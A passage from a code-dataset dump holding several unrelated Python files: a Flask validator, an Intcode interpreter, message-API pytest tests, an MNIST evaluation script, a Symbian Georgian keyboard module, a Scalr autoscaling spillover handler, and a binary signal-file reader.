sorted(periods, key=lambda x: x.start_time)\n for period in periods:\n if not (end_time <= period.start_time or start_time >= period.end_time):\n return False\n return True\n\nclass ParametersValidator():\n\n # define parameter validators here\n def __init__(self):\n self.schema = Schema({\n 'param_1': All(str, Length(min=5)),\n 'param_2': All(self.Int()),\n 'param_3': All(self.Date())\n })\n\n def validate(self, parameters):\n fail_dict = {}\n for key in parameters:\n try:\n self.schema({key: parameters[key]})\n except Invalid as e:\n fail_dict[key] = {'value': parameters[key],\n 'msg': e.msg}\n LOG.exception(e.msg)\n return fail_dict\n\n # helper methods\n def Date(self, fmt='%Y/%m/%d'):\n return lambda v: datetime.datetime.strptime(v, fmt)\n\n def Int(self):\n def is_int(v):\n try:\n int(v)\n except Exception as e:\n raise Invalid('not int')\n return is_int\n\n\nParamsValidator = ParametersValidator()\n\n\ndef judge_file(file, size):\n '''\n To judge whether the file is valid.\n @param file: the file object\n @param size: the size(MB) of the limit of the file.\n '''\n try:\n if file and size:\n if file.content_length > (size * 1024 * 1024):\n return False, \"too large\"\n temp = file.filename.split(\".\")\n file_type = temp[len(temp) - 1]\n if file_type == \"xls\" or file_type == \"xlsx\":\n return True, \"\"\n else:\n return False,\"type error\"\n else:\n raise \"Invalid parameter\"\n except Exception as ex:\n LOG.exception(\"Check File Failed: %s\", ex)\n return False, \"\"\n\n\nif __name__ == '__main__':\n pass","sub_path":"src/web/app/setting/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"512553310","text":"#!/usr/bin/env python3\n\ndef read_input():\n with open(\"input.txt\") as inp:\n prog = inp.readline()\n return prog.split(',')\n\ndef init(prog):\n prog[1] = 12\n prog[2] = 2\n return prog\n\ndef get_value(pos,mode):\n if mode == '0':\n val = prog[prog[pos]]\n else:\n val = prog[pos]\n return val\n\n\ndef add_store(prog,pos,mode1,mode2):\n val1 = get_value(pos+1,mode1)\n val2 = get_value(pos+2,mode2)\n prog[prog[pos+3]]=val1+val2\n\ndef mul_store(prog,pos,mode1,mode2):\n val1 = get_value(pos+1,mode1)\n val2 = get_value(pos+2,mode2)\n prog[prog[pos+3]]=val1*val2\n\ndef input_op(prog,pos):\n read = input(\"Input:\")\n prog[prog[pos+1]] = int(read)\n\ndef output(prog,pos,mode):\n print(\"Output:\",get_value(pos+1,mode))\n\ndef jump_if_true(prog,pos,mode1,mode2):\n val1 = get_value(pos+1,mode1)\n val2 = get_value(pos+2,mode2)\n if val1 != 0:\n newpos = val2\n else:\n newpos = pos+3\n return newpos\n\ndef jump_if_false(prog,pos,mode1,mode2):\n val1 = get_value(pos+1,mode1)\n val2 = get_value(pos+2,mode2)\n if val1 == 0:\n newpos = val2\n else:\n newpos = pos+3\n return newpos\n\ndef less_than(prog,pos,mode1,mode2):\n val1 = get_value(pos+1,mode1)\n val2 = get_value(pos+2,mode2)\n if val1 < val2:\n prog[prog[pos+3]] = 1\n else:\n prog[prog[pos+3]] = 0\n\ndef equals(prog,pos,mode1,mode2):\n val1 = get_value(pos+1,mode1)\n val2 = get_value(pos+2,mode2)\n if val1 == val2:\n prog[prog[pos+3]] = 1\n else:\n prog[prog[pos+3]] = 0\n\ndef run_prog(prog):\n pos = 0\n print(str(prog[pos]).zfill(5))\n while prog[pos] != 99:\n op = str(prog[pos]).zfill(5)\n try:\n if op[-2:] == '01':\n add_store(prog,pos,op[2],op[1])\n pos+=4\n elif op[-2:] == '02':\n mul_store(prog,pos,op[2],op[1])\n pos+=4\n elif op[-2:] == '03':\n input_op(prog,pos)\n pos+=2\n elif op[-2:] == '04':\n output(prog,pos,op[2])\n pos+=2\n elif op[-2:] == '05':\n pos = jump_if_true(prog,pos,op[2],op[1])\n elif op[-2:] == '06':\n pos = jump_if_false(prog,pos,op[2],op[1])\n elif op[-2:] == '07':\n less_than(prog,pos,op[2],op[1])\n pos+=4\n elif op[-2:] == '08':\n equals(prog,pos,op[2],op[1])\n pos+=4\n except Exception as e: \n print(e)\n print('Exception!!!!')\n return -1\n return prog[0]\n\ndef find_inputs(prog):\n test_prog = prog.copy()\n for i in range(0,100):\n for j in range(0,100):\n test_prog[1]=i\n test_prog[2]=j\n result = run_prog(test_prog)\n if result == 19690720:\n return i*100+j\n test_prog = prog.copy()\n\nif __name__ == \"__main__\":\n prog = read_input()\n prog = list(map(lambda x: int(x), prog))\n run_prog(prog)\n","sub_path":"day5/code2.py","file_name":"code2.py","file_ext":"py","file_size_in_byte":3033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"262490666","text":"import pytest\nfrom flask import g\nfrom flask import session\nfrom flask import *\nimport json\n\nfrom project.db import get_db\n\n\n# Test /message/send\ndef test_message_send(client, app):\n # Add existing message for error testing\n with app.app_context():\n get_db().execute('INSERT INTO messages (userfrom, userto, messagecontent,flag) VALUES (?, ?, ?, ?);',\n (\"mary\", \"jane\", \"hello\", 0))\n get_db().commit()\n\n url = \"/message/send\"\n\n # test a valid POST request\n valid_data = {\"userfrom\": \"mary\",\n \"userto\": \"jane\", \"messagecontent\": \"hello\", \"flag\": 0}\n assert client.post(url, data=valid_data).status_code == 201\n\n # test that the user was inserted into the database\n with app.app_context():\n assert (\n get_db().execute(\"SELECT * FROM messages WHERE userfrom = 'mary'\").fetchone()\n is not None\n )\n\n\n@pytest.mark.parametrize(\n (\"userfrom\", \"userto\", \"messagecontent\",\n \"flag\", \"message\", \"http_status_code\"),\n (\n (\"\", \"ross\", \"hello\", 0, b\"No user from\", 404),\n (\"bob\", \"\", \"hello\", 0, b\"No user to\", 404),\n (\"bob\", \"ross\", \"\", 0, b\"No message\", 404),\n\n ),\n)\ndef test_message_send_validate(client, userfrom, userto, messagecontent, flag, message, http_status_code):\n url = \"/message/send\"\n bad_data = {\"userfrom\": userfrom, \"userto\": userto,\n \"messagecontent\": messagecontent, \"flag\": flag}\n\n response = client.post(url, data=bad_data)\n\n assert http_status_code == response.status_code\n assert message in response.data\n\n\n# Test message/delete\ndef test_message_delete(client, app):\n # Add user for delete testing\n with app.app_context():\n get_db().execute('INSERT INTO messages (userfrom, userto, messagecontent, flag) VALUES (?, ?, ?, ?);',\n (\"delete\", \"message\", \"please\", 0))\n get_db().commit()\n\n url = \"/message/delete\"\n\n # test a valid POST request\n valid_data = {\"userfrom\": \"delete\",\n \"messagecontent\": \"please\"}\n assert client.post(url, data=valid_data).status_code == 201\n\n # test that the new email was inserted into the database\n with app.app_context():\n assert (\n get_db().execute(\"SELECT * FROM messages where userfrom = 'delete' \").fetchone()\n is None\n )\n\n\n@pytest.mark.parametrize(\n (\"userfrom\", \"messagecontent\", \"message\", \"http_status_code\"),\n (\n (\"\", \"hello\", b\"user doesn't exist\", 404),\n (\"bob\", \"\", b\"no message provided\", 404),\n ),\n)\ndef test_message_delete_validate(client, userfrom, messagecontent, message, http_status_code):\n url = \"/message/delete\"\n bad_data = {\"userfrom\": userfrom, \"messagecontent\": messagecontent}\n\n response = client.post(url, data=bad_data)\n\n assert http_status_code == response.status_code\n assert message in response.data\n\n\n# Test message/flag\ndef test_message_flag(client, app):\n # Add user for delete testing\n with app.app_context():\n get_db().execute('INSERT INTO messages (userfrom, userto, messagecontent, flag) VALUES (?, ?, ?, ?);',\n (\"flag\", \"this\", \"messagetest\", 1))\n get_db().commit()\n\n url = \"/message/flag\"\n\n # test a valid POST request\n valid_data = {\"messagecontent\": \"messagetest\",\"flag\": 1}\n assert client.post(url, data=valid_data).status_code == 201\n\n # test that the user was deleted from the database\n with app.app_context():\n assert (\n get_db().execute(\"SELECT * from messages where messagecontent = 'messagetest'\").fetchone()\n is not None\n )\n\n\n@pytest.mark.parametrize(\n (\"messagecontent\",\"flag\", \"message\", \"http_status_code\"),\n (\n (\"\",1, b\"message can't be found\", 404),\n \n ),\n)\ndef test_message_flag_validate(client, messagecontent,flag, message, http_status_code):\n url = \"/message/flag\"\n bad_data = {\"messagecontent\": messagecontent,\"flag\":flag}\n\n response = client.post(url, data=bad_data)\n\n assert http_status_code == response.status_code\n assert message in response.data\n","sub_path":"tests/test_message.py","file_name":"test_message.py","file_ext":"py","file_size_in_byte":4115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"395622977","text":"# -*-encoding:utf8-*-\n\nfrom classifier.ListClassifier import ListClassifier\n\n\nimport os\nimport argparse\nimport pandas as pd\nimport pickle\n\nfrom sklearn import metrics\n\n\nDIR_SERIALIZED_CLASSIFIERS = os.path.dirname(__file__) + \"/serializedClassifiers/\"\n\nPROG = \"Lance le test pour les classifiers implémentés\"\nparser = argparse.ArgumentParser(prog='PROG')\n\nparser.add_argument('--rf', action=\"store_true\", dest=\"rf\",\n help=\"Lance l'apprentissage du Random forest\")\nparser.add_argument('--svm', action=\"store_true\", dest=\"svm\",\n help=\"Lance l'apprentissage du SVM\")\nparser.add_argument('--nn', action=\"store_true\", dest=\"nn\",\n help=\"Lance l'apprentissage du Perceptron Multicouche\")\n\nargs = parser.parse_args()\n\nrf = args.rf\nsvm = args.svm\nnn = args.nn\n\ntest_file = os.path.dirname(__file__) + \"/mnistData/mnist_test.csv\"\n\ndataset = pd.read_csv(test_file)\n\n# numpy array of values of targets\ntarget = dataset[[0]].values.ravel()\ndata = dataset.iloc[:, 1:].values\n# Normalisation des données\ndata_predict = data / 255.\n\n# liste des classifiers\nl_cls = []\n# noms des classifiers\nnames_cls = []\n\n# déserialisation des modèles\nif rf:\n print(\"INFO: Prise en compte du Random Forest\")\n with open(DIR_SERIALIZED_CLASSIFIERS + \"RandomForestWrap.pkl\", 'rb') as f:\n rfw = pickle.load(f)\n l_cls.append(rfw)\n names_cls.append(\"Random Forest\")\nif svm:\n print(\"INFO: Prise en compte du SVM\")\n with open(DIR_SERIALIZED_CLASSIFIERS + \"SVMWrap.pkl\", 'rb') as f:\n svmw = pickle.load(f)\n l_cls.append(svmw)\n names_cls.append(\"SVM\")\n\nif nn:\n print(\"INFO: Prise en compte du Perceptron Multicouche\")\n with open(DIR_SERIALIZED_CLASSIFIERS + \"NeuralNetworkWrap.pkl\", 'rb') as f:\n nnw = pickle.load(f)\n l_cls.append(nnw)\n names_cls.append(\"Perceptron Multicouche\")\n\n\nprint(\"INFO: Prédiction :\")\n# Affichage les mesures\nprint(\"\\nINFO: Classification Report :\")\nfor i, cls in enumerate(l_cls):\n labels = cls.predict(data_predict[:100])\n print(\"\\nClassification report for classifier %s:\\n%s\\n\"\n % (names_cls[i],\n metrics.classification_report(target[:100], labels)))\n\n\n\n\n\n\n","sub_path":"mnist_test_models.py","file_name":"mnist_test_models.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"19743292","text":"# -*- coding: utf-8 -*-\n# Copyright (C) 2009 Lado Kumsiashvili \n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.\n#\n\nfrom geoinputbase import geoinputbase\nimport appuifw\nfrom utils import u\nfrom key_codes import EKey0, EKey1, EKey2, EKey3, EKey4, EKey5, EKey6, EKey7, EKey8, EKey9, EKeyHash, EModifierCtrl, EKeyBackspace, EScancodeBackspace, EScancodeHash\nfrom keycapture import KeyCapturer\nfrom keypress import simulate_key\n\n\nclass geoinput(geoinputbase):\n def __init__(self):\n geoinputbase.__init__(self)\n\n def init(self):\n geoinputbase.init(self)\n #self.log(\"geoinput\")\n self.mainCapturer = None #main caputurer\n self.switcherCapturer = None\n self.switcherFirstClickCapturer = None\n\n self.switcherFirsKeyLastClickAt = 0\n self.mod = 0\n self.keymap = {\n EKey0 : [\" \", \"0\", \"\\r\"],\n\n EKey1 : [\".\", \",\", \"?\", \"!\", \"@\", \"'\", \"-\", \"1\"],\n EKey2 : [\"ა\", \"ბ\", \"ც\", \"ჩ\", \"2\"],\n EKey3 : [\"დ\", \"ე\", \"ფ\", \"3\"],\n EKey4 : [\"გ\", \"ჰ\", \"ი\", \"4\"],\n EKey5 : [\"ჯ\", \"კ\", \"ლ\", \"ჟ\", \"5\"],\n EKey6 : [\"��\", \"ნ\", \"ო\", \"6\"],\n EKey7 : [\"პ\",\"ქ\",\"რ\",\"ს\",\"ღ\",\"შ\",\"7\"],\n EKey8 : [\"ტ\",\"უ\",\"ვ\",\"თ\",\"8\"],\n EKey9 : [\"წ\",\"ხ\",\"ყ\",\"ზ\",\"ჭ\",\"ძ\",\"9\"]\n }\n for value in self.keymap.values():\n for i in range(len(value)):\n value[i]=ord(u(value[i]))\n\n def initMainCapturer(self):\n self.mainCapturer = KeyCapturer(self.mainCallBack)\n self.mainCapturer.keys = tuple(self.keymap.keys())\n self.mainCapturer.start()\n self.initSwitcherCapturers()\n\n\n def mainCallBack(self, key):\n if self.isExceptionInFg():\n self.mainCapturer.stop()\n simulate_key(key, key)\n self.mainCapturer.start()\n return\n if key == EKey0:\n if self.switcherCallBack(key):\n return\n self.checkTime()\n if self.lastKey == key :\n self.backspaceCapturer.stop() # we must stop backspace, because the next call is a \"dummy backSpace\" to remove a digit in-place\n sim_key = self.getSimKey(key) #self.keymap[key][mod]\n if sim_key == key : # got number, we need special handling\n self.mainCapturer.stop() # commonCapturer must not capture next fired keyKode.\n simulate_key(EKeyBackspace, EScancodeBackspace)\n simulate_key(key, 0, EModifierCtrl) # send number code\n self.mainCapturer.start()\n else : # usuall handling\n simulate_key(EKeyBackspace, EScancodeBackspace)\n simulate_key(sim_key, sim_key)\n self.backspaceCapturer.start() # enable backspace forwarding\n else:\n sim_key = self.keymap[key][0]\n simulate_key(sim_key, sim_key)\n self.lastKey = key\n self.mod = 1\n\n ## #\n def getSimKey(self, key):\n key_tuple = self.keymap[key]\n sim_key = key_tuple[self.mod]\n self.mod = (self.mod + 1) % len(key_tuple)\n return sim_key\n\n\n def getSwitchetFirstKey(self):\n return [EKeyHash]\n\n def getSwitcherSecondKey(self):\n return [EKey0]\n\n\n def stopMainCapturer(self):\n self.mainCapturer.stop()\n\n def startMainCapturer(self):\n self.mainCapturer.start()\n\n def shutdown(self):\n geoinputbase.shutdown(self)\n del self.mainCapturer\n\n\n def start(self):\n geoinputbase.start(self)\n if self.switcherSecondKeyInMainCapturer():\n self.switcherCapturer.stop()\n else:\n self.switcherCapturer.start()\n self.currentLang = u'ka'\n\n def switcherSecondKeyInMainCapturer(self) :\n return True\n\n # # #\n def initSwitcherCapturers(self):\n self.switcherCapturer = KeyCapturer(self.switcherCallBack)\n self.switcherCapturer.keys = tuple(self.getSwitcherSecondKey())\n self.switcherCapturer.forwarding = 1\n if not self.switcherSecondKeyInMainCapturer() :\n self.switcherCapturer.start()\n self.switcherFirstClickCapturer = KeyCapturer(self.switcherFirstClickCallBack)\n self.switcherFirstClickCapturer.keys = tuple(self.getSwitchetFirstKey())\n self.switcherFirstClickCapturer.forwarding = 1\n self.switcherFirstClickCapturer.start()\n\n\n def needToggle(self):\n now = self.now()\n timeDiff = now - self.switcherFirsKeyLastClickAt\n if timeDiff < 0.33:\n self.switcherFirsKeyLastClickAt = 0\n self.switcherCapturer.forwarding = 0\n return True\n return False\n\n\n # # #\n def switcherCallBack(self, key):\n if key in self.getSwitcherSecondKey():\n if self.isExceptionInFg():\n return False\n if not self.needToggle():\n return False\n retval = self.toggle()\n simulate_key(EKeyHash, EScancodeHash)\n return retval\n\n # # #\n def switcherFirstClickCallBack(self, key):\n if key in self.getSwitchetFirstKey():\n self.switcherFirsKeyLastClickAt = self.now()\n\n def stop(self):\n geoinputbase.stop(self)\n self.switcherCapturer.forwarding = 1\n if self.switcherSecondKeyInMainCapturer():\n self.switcherCapturer.start()\n","sub_path":"geoinput.py","file_name":"geoinput.py","file_ext":"py","file_size_in_byte":6099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"300961350","text":"# coding:utf-8\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nVARIABLE_SPILLOVER_ALIAS = \"SPILLOVER_ALIAS\"\nVARIABLE_SPILLOVER_UPSCALE_MININSTANCES = \"SPILLOVER_UP_MININSTANCES\"\nVARIABLE_SPILLOVER_DOWNSCALE_MININSTANCES = \"SPILLOVER_DOWN_MININSTANCES\"\n\nSPILLOVER_STATUSES = (\"Pending\", \"Initializing\", \"Running\")\n\n\ndef extract_item_list(obj_dict, key):\n # Helper method to extract a list of 'Item' at a key\n # We have to handle the edge case where there are no items at all, and\n # the edge case where is only one item (which is therefore returned as a list)\n obj_set = obj_dict.get(key)\n if obj_set is None:\n obj_set = {\"Item\": []}\n objs = obj_set[\"Item\"]\n return [objs] if isinstance(objs, dict) else objs\n\n\nclass FarmRoleNotFound(Exception):\n pass\n\n\nclass ScalingStatus(object):\n def __init__(self, farm_role_dict):\n self.min_instances = int(farm_role_dict[\"ScalingProperties\"][\"MinInstances\"])\n self.max_instances = int(farm_role_dict[\"ScalingProperties\"][\"MaxInstances\"])\n\n servers = extract_item_list(farm_role_dict, \"ServerSet\")\n spillover_server_set = [server_dict for server_dict in servers\n if server_dict[\"Status\"] in SPILLOVER_STATUSES]\n\n self.spillover_server_count = len(spillover_server_set)\n\n def is_at_max(self):\n return self.spillover_server_count >= self.max_instances\n\n def is_at_min(self):\n return self.spillover_server_count <= self.min_instances\n\n\nclass FarmRole(object):\n def __init__(self, farm_role_dict):\n self.farm_role_dict = farm_role_dict\n self.scaling_status = ScalingStatus(farm_role_dict)\n\n @property\n def id(self):\n return self.farm_role_dict[\"ID\"]\n\n @property\n def alias(self):\n return self.farm_role_dict[\"Alias\"]\n\n @classmethod\n def _from_farm_dict_with_prop(cls, farm_dict, searched_prop, searched_value):\n # Only one Farm Role this fails!\n for farm_role_dict in extract_item_list(farm_dict, \"FarmRoleSet\"):\n value = farm_role_dict[searched_prop]\n if value != searched_value:\n continue\n return FarmRole(farm_role_dict)\n raise FarmRoleNotFound(\"Unable to find Farm Role with {0}: '{1}'\".format(searched_prop, searched_value))\n\n @classmethod\n def from_farm_dict_with_alias(cls, farm_dict, searched_alias):\n return cls._from_farm_dict_with_prop(farm_dict, \"Alias\", searched_alias)\n\n @classmethod\n def from_farm_dict_with_id(cls, farm_dict, searched_id):\n return cls._from_farm_dict_with_prop(farm_dict, \"ID\", searched_id)\n\n\nclass EventHandler(object):\n def __init__(self, payload, api_client):\n self.payload = payload\n self.api_client = api_client\n self.logger = logging.getLogger(\":\".join((__name__, self.payload[\"eventId\"])))\n\n self.handlers = {\n \"BeforeInstanceLaunch\": self.handle_scale_up,\n \"HostInit\": self.handle_scale_up,\n \"HostUp\": self.handle_scale_up,\n \"HostDown\": self.handle_scale_down,\n \"BeforeHostTerminate\": self.handle_scale_down,\n \"InstanceLaunchFailed\": self.handle_error,\n }\n\n def handle(self):\n event_name = self.payload[\"eventName\"]\n handler = self.handlers.get(event_name)\n if handler is None:\n self.logger.info(\"No handler for event: '%s'\", event_name)\n return\n handler()\n\n def _api_set_min_instances(self, farm_role, min_instances):\n self.logger.info(\"Setting MinInstances on '%s' to %s\", farm_role.alias, min_instances)\n\n self.api_client.call(\"FarmUpdateRole\", {\n \"FarmRoleID\": farm_role.id,\n \"Configuration[scaling.enabled]\": \"1\",\n \"Configuration[scaling.min_instances]\": min_instances\n })\n\n def _api_increase_min_instances(self, farm_role, min_instances):\n if farm_role.scaling_status.min_instances >= min_instances:\n self.logger.debug(\"On '%s', not increasing MinInstances to %s, MinInstances is already at %s\",\n farm_role.alias, min_instances, farm_role.scaling_status.min_instances)\n return\n self._api_set_min_instances(farm_role, min_instances)\n\n\n def _api_decrease_min_instances(self, farm_role, min_instances):\n if farm_role.scaling_status.min_instances <= min_instances:\n self.logger.debug(\"On '%s', not decreasing MinInstances to %s, MinInstances is already at %s\",\n farm_role.alias, min_instances, farm_role.scaling_status.min_instances)\n return\n self._api_set_min_instances(farm_role, min_instances)\n\n def _handle_spillover_event(self, callback):\n triggering_farm_role_id = self.payload[\"data\"][\"SCALR_FARM_ROLE_ID\"]\n spillover_alias = self.payload[\"data\"].get(VARIABLE_SPILLOVER_ALIAS)\n\n if spillover_alias is None:\n self.logger.debug(\"No spillover alias\")\n return\n self.logger.info(\"Spillover alias is '%s'\", spillover_alias)\n\n # We have a spillover alias, call the API to figure whether we need to spillover\n farm_id = self.payload[\"data\"][\"SCALR_FARM_ID\"]\n self.logger.info(\"Farm ID is '%s'\", farm_id)\n\n farm_dict = self.api_client.call(\"FarmGetDetails\", {\"FarmID\": farm_id})\n\n #Note: We could merge these two loops for performance, but let's keep it simple here!\n\n self.logger.debug(\"Searching for spillover Farm Role '%s'\", spillover_alias)\n spillover_role = FarmRole.from_farm_dict_with_alias(farm_dict, spillover_alias)\n self.logger.info(\"Spillover Role found '%s' (%s)\", spillover_role.alias, spillover_role.id)\n\n self.logger.debug(\"Searching for Triggering Farm Role '%s'\", triggering_farm_role_id)\n triggering_role = FarmRole.from_farm_dict_with_id(farm_dict, triggering_farm_role_id)\n self.logger.info(\"Triggering Role found '%s' (%s)\", triggering_role.alias, triggering_role.id)\n\n self.logger.info(\"Scaling status: %s/%s\", triggering_role.scaling_status.spillover_server_count,\n triggering_role.scaling_status.max_instances)\n\n callback(triggering_role, spillover_role)\n\n ## BeforeInstanceLaunch ##\n\n def _handle_scale_up_callback(self, triggering_role, spillover_role):\n spillover_up_min = int(self.payload[\"data\"].get(VARIABLE_SPILLOVER_UPSCALE_MININSTANCES, 1))\n\n if not triggering_role.scaling_status.is_at_max():\n self.logger.debug(\"No spillover needed for: '%s'\", triggering_role.alias)\n return\n self.logger.info(\"Spillover needed for: '%s'\", triggering_role.alias)\n\n self._api_increase_min_instances(spillover_role, spillover_up_min)\n\n def handle_scale_up(self):\n self._handle_spillover_event(self._handle_scale_up_callback)\n\n ## InstanceLaunchFailed ##\n\n def _handle_error_callback(self, triggering_role, spillover_role):\n spillover_up_min = int(self.payload[\"data\"].get(VARIABLE_SPILLOVER_UPSCALE_MININSTANCES, 1))\n\n self.logger.info(\"Launch failed on: '%s'\", triggering_role.alias)\n\n self._api_increase_min_instances(spillover_role, spillover_up_min)\n\n def handle_error(self):\n self._handle_spillover_event(self._handle_error_callback)\n\n\n ## Host down ##\n\n def _handle_scale_down_callback(self, triggering_role, spillover_role):\n spillover_down_min = int(self.payload[\"data\"].get(VARIABLE_SPILLOVER_DOWNSCALE_MININSTANCES, 0))\n\n if not triggering_role.scaling_status.is_at_min():\n self.logger.debug(\"No end spillover needed for: '%s'\", triggering_role.alias)\n return\n\n self.logger.info(\"End spillover needed for: '%s'\", triggering_role.alias)\n\n self._api_decrease_min_instances(spillover_role, spillover_down_min)\n\n def handle_scale_down(self):\n self._handle_spillover_event(self._handle_scale_down_callback)\n\n","sub_path":"core/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":7960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"125552524","text":"\"\"\"\nРеализовать функцию int_func(), принимающую слово из маленьких латинских букв и возвращающую его же,\nно с прописной первой буквой. Например, print(int_func(‘text’)) -> Text.\nПродолжить работу над заданием. В программу должна попадать строка из слов, разделенных пробелом.\nКаждое слово состоит из латинских букв в нижнем регистре. Сделать вывод исходной строки,\nно каждое слово должно начинаться с заглавной буквы. Необходимо использовать написанную ранее функцию int_func().\n\"\"\"\n\n\n# Реализуем без встроенного метода str.title().\ndef title_func(text: str) -> str:\n return text.replace(text[0], chr(ord(text[0]) - 32), 1)\n\n\n# Создадим случайный текст. Знаю, import не проходили, но текст каждый раз писать неудобно.\ndef random_text(length: int) -> str:\n import random\n text = \"\"\n for i in range(length):\n text += chr(random.randint(ord('a'), ord('z')))\n return text.replace(text[random.randint(0, len(text))], \" \")\n\n\n# Решим поставленную задачу. Здесь проще преобразовать через map, но используем старый добрый цикл.\nif __name__ == \"__main__\":\n words_set = random_text(int(input(f'Введите количество символов в тексте!\\n')))\n print(f'Полученный текст:\\n{\"+\" * 50}\\n{words_set}\\n{\"+\" * 50}')\n words_set = words_set.split()\n for item in range(len(words_set)):\n words_set[item] = title_func(words_set[item])\n words_set = \" \".join(words_set)\n print(f'Измененный текст:\\n{words_set}\\n{\"+\" * 50}')\n","sub_path":"Lesson3/base_les3_6.py","file_name":"base_les3_6.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"604161835","text":"import re\nfrom functools import reduce\nimport matplotlib.pyplot as plt\nimport binascii\nimport struct\nimport array\nimport os\n\nfrom src import MainDialog\n\n\ndef main(fileName):\n\n\n # print(os.path.abspath(os.path.join(os.path.dirname(__file__), '..\\..\\Data.rec')))\n f = open(fileName, 'rb')\n\n # Считываем сигнатуру\n signature = f.read(4)\n print('Сигнатура hex', signature, signature[::-1])\n print('сигнатура dec', reduce(lambda s, x: s * 256 + x, bytearray(list(reversed(signature)))))\n\n # Перемещаемся к 5-му байту для считывания числа сигналов\n f.seek(4)\n\n # Считываем число сигналов\n quantity_of_signals = f.read(2)\n int_quantity_of_signals = reduce(lambda s, x: s * 256 + x, bytearray(quantity_of_signals[::-1]))\n\n print('Количество сигналов', int_quantity_of_signals)\n\n # Перемещаемся к 7-му байту для считывания количества разовых команд\n f.seek(6)\n\n quantity_of_raz_command = f.read(2)\n int_quantity_of_raz_command = reduce(lambda s, x: s * 256 + x, bytearray(list(reversed(quantity_of_raz_command))))\n print('Количество разовых команд', int_quantity_of_raz_command)\n\n # Перемещаемся к 9-му байту для считывания количества записанных тактов\n f.seek(8)\n quantity_of_tacts = f.read(4)\n int_quantity_of_tacts = reduce(lambda s, x: s * 256 + x, bytearray(list(reversed(quantity_of_tacts))))\n print('Количество записанных тактов', int_quantity_of_tacts)\n\n # Перемещаемся к 14-му байту для считывания частоты записи\n f.seek(12)\n recording_frequency = f.read(2)\n recording_frequency = reduce(lambda s, x: s * 256 + x, bytearray(recording_frequency[::-1]))\n print('Частота записи', recording_frequency)\n f.seek(14)\n\n # перемещаемся по байтам для считывания длины описания каждого сигнала и его описания\n k = 0 # счётчик обходов\n for i in range(int_quantity_of_signals):\n desclen = f.read(1)\n intdesclen = reduce(lambda s, x: s * 256 + x, bytearray(list(reversed(desclen))))\n f.seek(14 + k + 1)\n signal_desc = f.read(intdesclen)\n signal_desc = signal_desc.decode('ansi')\n signal_desc = re.split(r' ', signal_desc, maxsplit=1)\n signal_name = signal_desc[0]\n signal_desc = signal_desc[1]\n\n print(intdesclen, signal_name, signal_desc)\n\n f.seek(14 + k + 1 + intdesclen)\n k += 1 + intdesclen\n\n print('-----------------------------------------------------------------')\n\n # Перемещаемся по байтам для считывания длин описания каждой разовой команды и их описаний\n for n in range(int_quantity_of_raz_command):\n rkdesclen = f.read(1)\n intrkdesclen = reduce(lambda s, x: s * 256 + x, bytearray(list(reversed(rkdesclen))))\n f.seek(14 + k + 1)\n rkdesc = f.read(intrkdesclen)\n # print(rkdesc.decode('ansi'))\n print(intrkdesclen, rkdesc.decode('ansi'))\n f.seek(14 + k + 1 + intrkdesclen)\n k += 1 + intrkdesclen\n\n print('-----------------------------------------------------------------')\n print('k ', k)\n\n # Перемещаемся по байтам для считывания сигналов и разовых команд на тактах\n\n # тут int_quantity_of_tacts\n tlist = []\n s1 = []\n s2 = []\n rk1 = []\n for t in range(int_quantity_of_tacts):\n # Считывание сигналов\n tlist.append((t + 1) / 100)\n # print(f.read(4*int_quantity_of_signals))\n signals = f.read(4 * int_quantity_of_signals)\n floatsignals = struct.unpack('%sf' % int_quantity_of_signals, signals)\n # print(len(floatsignals))\n # print(floatsignals.__len__())\n s1.append(floatsignals[0])\n s2.append(floatsignals[1])\n\n f.seek(14 + k + 4 * int_quantity_of_signals)\n\n # for j in range(int_quantity_of_signals):\n # signal = f.read(4)\n # intsignal = struct.unpack('f',signal)\n # f.seek(14+k+4*(j+1))\n #\n # f.seek(14+k+(4*int_quantity_of_signals + int_quantity_of_raz_command)*(t+1))\n # if t > 9980:\n # for flsignal in floatsignals:\n # print('сигналы: ', signals, flsignal)\n # print(14+k+4*(j+1))\n\n # Считывание разовых команд\n raz_command = f.read(int_quantity_of_raz_command)\n int_raz_command = struct.unpack('%sb' % int_quantity_of_raz_command, raz_command)\n\n # Добавляем значения разовой команды №37 в список\n rk1.append(int_raz_command[37])\n # print('Разовые команды: ', int_raz_command)\n\n f.seek(14 + k + (4 * int_quantity_of_signals) + int_quantity_of_raz_command)\n k += (4 * int_quantity_of_signals) + int_quantity_of_raz_command\n\n # print('Разовая команда: ', rk1)\n\n # # Построение графика\n # fig = plt.figure()\n # # scatter1 = plt.scatter(0.0, 3.0)\n # plt.errorbar(tlist, s1)\n # plt.errorbar(tlist, rk1)\n # grid1 = plt.grid(True)\n # plt.show()\n\n\nif __name__ == \"__main__\":\n main(\"C:/Users/alexxstepan/PycharmProjects/Data.rec\")\n\n","sub_path":"src/Reader.py","file_name":"Reader.py","file_ext":"py","file_size_in_byte":5646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"195660991","text":"#!/usr/bin/python\n#-*- coding: UTF-8 -*-\n\nimport unittest\nimport requests\n\n\nclass 